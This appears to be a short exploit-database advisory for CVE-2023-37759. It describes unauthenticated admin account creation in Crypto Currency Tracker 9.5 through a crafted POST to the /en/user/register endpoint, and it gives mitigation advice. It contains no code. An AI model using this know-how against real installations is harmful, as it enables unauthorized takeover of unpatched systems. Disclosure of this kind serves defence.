Vendor: Crypto Currency Tracker
Author: 0xBr
CVSS: 9.8 (CRITICAL)
Vulnerability Type: Admin Account Creation
CWE: CWE-798
Product Name: Crypto Currency Tracker
Affected Version From: <=9.5
Affected Version To: 9.5
Patch Exists: NO
Related CVE: CVE-2023-37759
CPE: a:crypto_currency_tracker:crypto_currency_tracker:9.5
Platforms Tested:
2023
Crypto Currency Tracker (CCT) 9.5 – Admin Account Creation (Unauthenticated)
This exploit allows an unauthenticated user to create an admin account in Crypto Currency Tracker (CCT) version 9.5 or earlier. By sending a specially crafted POST request to the /en/user/register endpoint, an attacker can bypass authentication and register an account with administrative privileges.
Mitigation:
No vendor patch is available at the time of writing. The vendor should release a patch that fixes the authentication bypass. In the meantime, users can reduce the risk by restricting access to the /en/user/register endpoint (for example, at the web server or reverse proxy level) or by implementing additional authentication measures in front of it.